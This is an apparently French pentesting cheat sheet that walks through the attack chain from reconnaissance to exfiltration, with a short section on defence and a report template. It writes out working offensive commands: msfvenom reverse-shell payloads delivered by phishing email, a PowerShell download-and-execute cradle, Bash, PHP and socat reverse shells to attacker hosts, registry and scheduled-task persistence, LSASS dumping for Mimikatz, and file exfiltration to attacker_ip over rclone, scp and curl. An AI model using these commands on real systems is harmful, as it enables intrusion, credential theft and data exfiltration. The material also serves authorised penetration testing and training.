Pentesting & Cybersécurité : Guide Essentiel des Outils

1. Reconnaissance (Passive & Active)

★★★ [PASSIF] whois example.com

• Affiche les informations d'enregistrement du domaine (propriétaire, registrar, DNS, dates).
• Repérer les serveurs DNS, e-mails ou noms d'organisation à approfondir.

★★★ [PASSIF] theHarvester -d example.com -b all

• Récupère les e-mails, sous-domaines, noms d'hôtes à partir de moteurs publics (Google, Bing, etc.).
• Vérifier les e-mails (HaveIBeenPwned, Google Dork), scanner les hôtes trouvés.

★★★ [PASSIF] sublist3r -d example.com

• Énumère rapidement les sous-domaines d'un domaine.
• Scanner chaque sous-domaine avec httpx, Nmap ou WhatWeb.

★★ [PASSIF] crt.sh/?q=example.com

• Cherche les certificats SSL liés au domaine (contient souvent des sous-domaines).
• Identifier des environnements oubliés ou de préproduction à tester.

★★ [PASSIF] assetfinder --subs-only example.com

• Découvre rapidement les sous-domaines via l'OSINT.
• Scanner avec httpx/Nmap et croiser les résultats.

★★ [PASSIF] gau example.com | tee urls.txt

• Récupère des URL archivées depuis Wayback Machine, Google Cache, etc.
• Identifier des pages obsolètes ou vulnérables (upload.php, admin/, etc.).

★★ [ACTIF] hakrawler -url https://example.com -depth 3

• Crawler actif des pages web et des points d'accès cachés.
• Tester les routes trouvées pour l'authentification, l'injection, le débogage.

★★★ [ACTIF] nmap -sC -sV -Pn example.com

• Scan complet avec détection de ports, services, versions et scripts par défaut.
• Tester les services vulnérables ou mal configurés.

★★ [ACTIF] nmap -p- --min-rate=1000 -T4 example.com

• Scan rapide de tous les ports TCP (1-65535).
• Scanner en détail les ports ouverts avec -sC -sV.

★★ [ACTIF] wafw00f https://example.com

• Détecte la présence d'un WAF (pare-feu applicatif).
• Adapter la stratégie (évasion ou attaques côté client).

★★ [ACTIF] whatweb https://example.com

• Détecte les CMS, technologies web, plugins (PHP, WordPress, etc.).
• Rechercher les vulnérabilités associées (Exploit-DB, CVE).

★★ [PASSIF] dig example.com ANY +short

• Interroge tous les enregistrements DNS (MX, TXT, A, etc.).
• Vérifier les fuites d'informations ou les configurations faibles (SPF, clés API, etc.).

★★ [ACTIF] dnsenum example.com

• Énumération DNS active avec force brute et extraction des sous-domaines.
• Ajouter à votre liste de cibles à scanner.

★★★ [ACTIF] gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt -t 50

• Fuzzing de répertoires et fichiers sur serveur web.
• Explorer les pages et fichiers sensibles (admin, config, backup, etc.).

2. Weaponization & Delivery

★★★ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > shell.exe

• Crée un exécutable Windows malveillant avec une connexion inversée Meterpreter.
• Héberger ce binaire sur un serveur, le livrer par phishing ou exploit, puis se mettre en écoute avec Metasploit.

★★ veil

• Génère des payloads obfusqués pour éviter les antivirus (reverse shell, stagers, etc.).
• Utiliser le binaire généré pour le contournement d'EDR/AV classique.

★★ Shellter

• Injecte un shell dans un exécutable légitime (calc.exe, notepad.exe).
• Envoyer l'exécutable par ingénierie sociale ou remplacer un binaire dans un environnement vulnérable.

★★ powershell -enc

• Encode une commande PowerShell en Base64 pour l'évasion.
• Coller dans une macro, un payload, ou un script d'installation furtif.

★★ sendemail -f [email protected] -t [email protected] -u "Urgent" -m "Open attached file" -a shell.exe -s smtp.server.com:587

• Envoie un e-mail avec un payload en pièce jointe via SMTP.
• Utiliser pour un test de phishing ou une campagne simulée dans un cadre autorisé.

★★ cat reverse.sh | base64 -w 0

• Encode un script en Base64 (utile pour une livraison obfusquée via commande).
• Déchiffrer à la cible avec echo <base64> | base64 -d > file.sh && bash file.sh.

★★★ Social Engineering (technique)

• Exploitation psychologique d'une cible pour ouvrir un document, cliquer sur un lien, ou révéler un mot de passe.
• Utiliser pour faire livrer un payload, obtenir une authentification, ou établir un point d'ancrage.

★★ macros VBA / Excel avec payload

• Crée un document Excel piégé avec une macro qui lance un script ou télécharge un exécutable.
• Utiliser avec Msfvenom ou PowerShell enc pour une livraison furtive.

★★ malicious .LNK (raccourcis Windows)

• Crée un raccourci piégé qui exécute un script malveillant.
• Utiliser pour un accès local, une clé USB, ou une livraison par ZIP.

★★ pdf payloads (ex: Metasploit)

• Crée un faux PDF avec un exploit intégré.
• Nécessite une ancienne vulnérabilité côté lecteur (rarement efficace aujourd'hui, mais utile en laboratoire).

3. Exploitation

★★★ sqlmap -u "http://site.com/page.php?id=1" --dbs

• Lance une attaque d'injection SQL automatique sur l'URL cible.
• Énumérer les bases de données, puis utiliser --tables et --dump pour extraire des données.

★★★ Metasploit Framework (msfconsole)

• Plateforme tout-en-un pour l'exécution d'exploits, payloads, scanners et post-exploitation.
• use exploit/... ; set RHOSTS, LHOST, etc. ; run

★★ searchsploit apache 2.4.49

• Recherche les vulnérabilités connues pour une version logicielle précise via Exploit-DB.
• Lire le code, tester manuellement ou l'adapter à l'environnement cible.

★★★ curl -X POST -d 'cmd=whoami' http://site.com/admin.php

• Teste une injection de commande via un formulaire HTTP POST.
• Essayer d'autres commandes ou variables ; observer la réponse.

★★ burpsuite (avec extensions)

• Proxy d'interception HTTP/HTTPS pour modifier, rejouer, injecter des requêtes web.
• Utiliser des plugins comme « Autorize », « Turbo Intruder » pour automatiser les tests.

★★ gobuster dir -u https://site.com -w wordlist.txt -t 50

• Fuzzing de répertoires et fichiers accessibles sur serveur web.
• Rechercher des chemins cachés : /admin, /backup, /dev, etc.

★★ ffuf -u https://site/FUZZ -w wordlist.txt

• Alternative rapide à Gobuster pour le fuzzing d'URL, de paramètres GET, POST ou de cookies.
• Analyser les codes de réponse (200, 403, 500) pour détecter des comportements inhabituels.

★★ xsshunter.com

• Plateforme pour traquer les XSS persistants via des payloads JavaScript personnalisés.
• Implante le payload dans les formulaires ; surveille les callbacks.

★★ XSStrike

• Fuzzing XSS intelligent pour détecter et contourner les filtres.
• Utiliser pour affiner les attaques côté client, avec bypass WAF.

★★ testssl.sh https://site.com

• Analyse SSL/TLS pour vérifier la sécurité des protocoles (certificats faibles, chiffrements obsolètes, etc.).
• Utiliser pour l'exploitation TLS ou MITM, selon le contexte.

★ exploitdb.com

• Base en ligne d'exploits publics pour des logiciels spécifiques.
• Télécharger, adapter ou tester manuellement les exploits si applicable.

4. Installation & Command & Control (C2)

★★★ nc -nlvp 4444

• Lance une écoute réseau sur le port 4444 pour recevoir un reverse shell.
• Se mettre en attente après avoir généré et exécuté un payload sur la cible.

★★★ ssh -R 4444:localhost:22 user@attacker_ip

• Crée un tunnel SSH inversé : la cible ouvre un port chez l'attaquant.
• Se connecter à la machine cible via le port exposé.

★★★ chisel server -p 9001 --reverse

• Ouvre un tunnel TCP inversé via HTTP.
• Depuis la cible : chisel client attacker_ip:9001 R:127.0.0.1:22 → accès SSH.

★★ socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash

• Crée un listener Socat pour exécuter un shell à réception.
• Envoyer une connexion depuis la cible : socat TCP:attacker_ip:4444 EXEC:/bin/bash

★★★ Empire / Sliver / Mythic / Koadic

• Frameworks de C2 pour le contrôle à distance, la persistance, la post-exploitation.
• Générer un agent, l'exécuter sur la cible, interagir (modules, pivots, credentials).

★★ powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')"

• Télécharge et exécute un script PowerShell à distance.
• Utiliser pour activer un agent ou lancer une commande persistante.

★★★ schtasks /create /tn "update" /tr "powershell -enc ..." /sc minute /mo 1

• Crée une tâche planifiée qui exécute un script toutes les minutes.
• Persistance automatique même après redémarrage.

★★ reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v updater /d "C:\malware.exe"

• Ajoute un exécutable au démarrage via la base de registre.
• À utiliser pour relancer un C2 ou un malware après redémarrage.

★★ Startup folder drop (Windows)

• Place un script ou exécutable dans le dossier Startup de l'utilisateur.
• Il sera lancé automatiquement au prochain démarrage.

★★★ msfconsole + use exploit/multi/handler

• Configure Metasploit en mode listener pour capturer un shell inversé.
• set PAYLOAD, LHOST, LPORT puis run.

5. Actions sur Objectifs (Post-Exploitation & Exfiltration)

★★★ Mimikatz

• Extrait les mots de passe et hachages en mémoire (logon passwords, Kerberos, etc.).
• Utiliser après élévation de privilège, surtout sur Windows avec accès SYSTEM.

★★★ bloodhound-python -c All

• Cartographie Active Directory pour trouver les chemins de privilèges (attack paths).
• Analyser avec BloodHound et viser un objectif : Domain Admin, contrôle d'objets, etc.

★★ crackmapexec smb 10.10.10.0/24 -u user -p password

• Teste des identifiants en masse sur le protocole SMB.
• Identifier les machines accessibles avec les droits fournis.

★★ rubeus asktgt / tgtdeleg / dump

• Permet d'exploiter Kerberos pour demander des tickets ou les réutiliser.
• Utiliser pour faire du pass-the-ticket ou extraire un TGT/TGS réutilisable.

★★ powerview.ps1 / seatbelt.exe

• Énumère les sessions, groupes locaux, GPO, chemins vers l'administrateur sur AD.
• Identifier les moyens d'élévation de privilège ou d'accès latéral.

★★★ evil-winrm -i target -u user -p password

• Shell distant via WinRM, méthode stable et discrète.
• Utiliser pour exécuter des commandes post-exploitation avec des droits élevés.

★★★ rclone copy /data remote:dump --config rclone.conf

• Exfiltration discrète de fichiers via stockage cloud (Dropbox, Mega, etc.).
• Utiliser après récupération de données sensibles (hashs, fichiers, bases).

★★ scp file.txt user@attacker_ip:~/loot/

• Exfiltration simple via SSH depuis une machine Linux ou via un shell.
• À utiliser si le port 22 est ouvert ou un tunnel est établi.

★ curl -F '[email protected]' http://attacker_ip/upload.php

• Upload de fichier via POST HTTP vers un serveur contrôlé.
• Exfiltration simple en environnement filtré (web-only).

★★★ find . -name '*pass*' -o -name '*.kdbx' -o -name '*.zip'

• Recherche de fichiers sensibles (KeePass, ZIP, mots de passe, etc.).
• Collecter pour extraction ou crack hors ligne.

★★★ procdump64.exe -accepteula -ma lsass.exe lsass.dmp

• Dump mémoire de LSASS pour extraire les mots de passe avec Mimikatz.
• Télécharger le fichier dump et l'analyser hors ligne.

6. Défense & Contre-mesures

★★★ journalctl /var/log/auth.log

• Affiche les tentatives de connexion sur Linux (SSH, sudo, etc.).
• Analyser pour repérer la force brute, les escalades, les connexions root.

★★★ eventvwr.msc (Windows Events Viewer)

• Permet d'examiner les logs Windows : sécurité, système, applications.
• Rechercher les IDs 4624 (login), 4625 (échec), 4720 (ajout utilisateur), etc.

★★★ Wazuh / Splunk / ELK

• SIEM pour centraliser et corréler les logs système, applicatifs et réseau.
• Mettre en place des alertes personnalisées, la détection d'anomalies.

★★ Zeek / Suricata

• Analyse réseau (IDS/NSM) pour détecter C2, exfiltration, scans.
• Installer sur une sonde réseau pour une inspection profonde.

★★ Sigma + Sysmon

• Corrélation d'événements Windows avec des règles open source.
• Détecter les comportements suspects même sans signature (ex : LOLBins).

★★ YARA / ClamAV

• Analyse de fichiers pour repérer des malwares par signature.
• Utiliser localement ou avec un moteur antivirus en ligne.

★★ iptables / ufw / firewall-cmd

• Filtrage réseau bas niveau (Linux) pour bloquer l'accès externe ou latéral.
• Restreindre l'accès aux ports sensibles (22, 445, etc.).

★★ auditd (Linux)

• Audit en profondeur des fichiers, accès, commandes systèmes.
• Analyser le comportement de processus anormaux ou suspects.

★★ AppLocker / GPO (Windows)

• Blocage d'exécution de binaires non approuvés.
• Empêcher l'exécution de payloads via scripts, macros, PowerShell.

★★ netstat / lsof / ss

• Affiche les connexions actives et les ports ouverts.
• Identifier les connexions suspectes ou les C2 actifs.

7. Bonus : Cheatsheet Linux / Windows

★★★ find / -perm -4000 2>/dev/null

• Recherche tous les fichiers SUID (potentielle élévation de privilèges).
• Tester chaque binaire avec GTFOBins ou manuellement.

★★★ netstat -tulnp / ss -tulnp

• Liste des ports ouverts et services en écoute.
• Identifier les services exposés ou inconnus pour un pivot ou un maintien d'accès.

★★★ whoami / id

• Affiche l'utilisateur courant et ses groupes.
• Vérifier les privilèges avant d'exécuter des actions sensibles.

★★★ cat /etc/passwd ; cat /etc/shadow

• Liste des comptes utilisateurs et leurs mots de passe hachés (root only).
• Cibler des comptes faibles ou chiffrer/cracker les hashs.

★★ uname -a ; hostname ; ip a

• Affiche les informations système : OS, noyau, IP.
• Détecter la plateforme, un noyau vulnérable, une IP interne à pivoter.

★★ systeminfo (Windows)

• Détaille le système, les patchs, l'OS, l'architecture.
• Rechercher des vulnérabilités via les CVE associées.

★★★ tasklist / taskkill / schtasks (Windows)

• Liste, tue, ou planifie des processus sous Windows.
• Utiliser pour la persistance ou pour masquer un outil C2.

★★ reg query / sc qc / net user

• Interroge le registre, les services et les comptes utilisateurs.
• Énumération de cibles pour l'escalade ou l'abus de configuration.

★★ echo $PATH ; env ; set

• Affiche les variables d'environnement du shell.
• Vérifier si des chemins modifiables permettent le hijack de commandes.

★★ chmod / chown

• Modifie les droits ou propriétaires des fichiers.
• Exploiter des fichiers mal protégés ou prendre le contrôle.

Linux Cheatsheet

• Linux - whoami
  Affiche l'utilisateur courant.
• Linux - id
  Affiche l'UID, GID et les groupes de l'utilisateur.
• Linux - uname -a
  Informations sur le noyau et la version système.
• Linux - hostname -I
  Affiche l'adresse IP locale.
• Linux - ps aux
  Liste tous les processus.
• Linux - netstat -tulnp
  Liste les ports ouverts avec les PID.
• Linux - ss -tulnp
  Alternative rapide à netstat.
• Linux - lsof -i
  Liste les connexions réseau et processus associés.
• Linux - find / -perm -4000 2>/dev/null
  Recherche de fichiers SUID (élévation de privilèges).
• Linux - crontab -l
  Affiche les tâches planifiées de l'utilisateur.
• Linux - cat /etc/passwd
  Liste des utilisateurs système.
• Linux - cat /etc/shadow
  Hashs de mots de passe (root).
• Linux - chmod +x file.sh
  Rend un fichier exécutable.
• Linux - chown user:user file
  Change le propriétaire d'un fichier.

Windows Cheatsheet

• Windows - whoami
  Affiche l'utilisateur courant.
• Windows - systeminfo
  Détaille les infos système, patchs, architecture.
• Windows - hostname
  Affiche le nom de l'hôte.
• Windows - ipconfig
  Affiche les configurations réseau.
• Windows - tasklist
  Liste des processus en cours.
• Windows - taskkill /PID <id> /F
  Tuer un processus par son PID.
• Windows - netstat -ano
  Ports ouverts et PID associés.
• Windows - schtasks /query
  Liste des tâches planifiées.
• Windows - net user
  Liste les comptes utilisateurs.
• Windows - net localgroup administrators
  Liste les administrateurs locaux.
• Windows - reg query HKCU
  Interroge le registre utilisateur.
• Windows - dir /s /b *.kdbx
  Recherche récursive de fichiers sensibles (ex: KeePass).

8. Compléments Avancés

> HASH CRACKING

• hashid hash.txt
  Identifie le type de hash à cracker.
• john --wordlist=rockyou.txt hash.txt
  Crack de mot de passe avec dictionnaire.
• hashcat -m 0 -a 0 hash.txt rockyou.txt
  Utilise Hashcat pour cracker un hash MD5 par dictionnaire.
• john --format=nt --wordlist=rockyou.txt ntlm_hashes.txt
  Crack NTLM (Windows).

> OSINT AVANCÉ

• theHarvester -d target.com -b all
  Récupère des e-mails, noms, sous-domaines.
• sherlock username
  Recherche un nom d'utilisateur sur plus de 300 plateformes.
• phoneinfoga scan -n +33612345678
  Informations sur un numéro de téléphone.
• ghunt [email protected]
  Analyse les informations liées à un compte Google.

> AD ENUM / ABUSE

• bloodhound-python -c All
  Énumération Active Directory à importer dans BloodHound.
• rubeus dump
  Dump de tickets Kerberos pour le pass-the-ticket.
• rpcclient -U '' target
  Énumère les comptes via RPC.
• crackmapexec smb target -u user -p pass
  Énumère les partages et droits SMB.

> PRIV ESC

• linpeas.sh
  Script Linux de recherche d'escalade de privilèges.
• winPEAS.bat
  Version Windows de LinPEAS.
• sudo -l
  Liste les commandes autorisées sans mot de passe.
• find / -perm -4000 2>/dev/null
  Recherche les fichiers SUID.

> PAYLOAD TYPES

• bash -i >& /dev/tcp/10.10.10.1/4444 0>&1
  Reverse shell Bash.
• php -r '$sock=fsockopen("10.10.10.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
  Reverse shell PHP.
• powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(...)"
  Reverse shell PowerShell.
• python -c 'import socket,subprocess,os;...'
  Reverse shell Python.

> PIVOTING & TUNNELS

• proxychains nmap -sT target
  Scan via un proxy SOCKS.
• chisel server -p 9999 --reverse
  Tunnel TCP inversé via HTTP.
• ssh -D 1080 user@bastion
  Proxy SOCKS avec SSH.
• ligolo-ng agent -connect attacker:port
  Tunnel automatique avec pivotage.

> LAB D'ENTRAÎNEMENT

• TryHackMe / HackTheBox
  Entraînement pratique sur des machines virtuelles.
• VulnHub + VirtualBox
  Créer son laboratoire localement avec des VM vulnérables.
• Docker metasploitable
  Machine vulnérable dockerisée pour les tests.

> MODÈLE DE RAPPORT

• Résumé exécutif
  1 page claire pour un manager non-technique.
• Détail par vulnérabilité
  Reproduction, gravité, risque métier.
• Captures d'écran
  Captures d'écran comme preuves pour chaque faille.
• Recommandations
  Par faille + priorisation.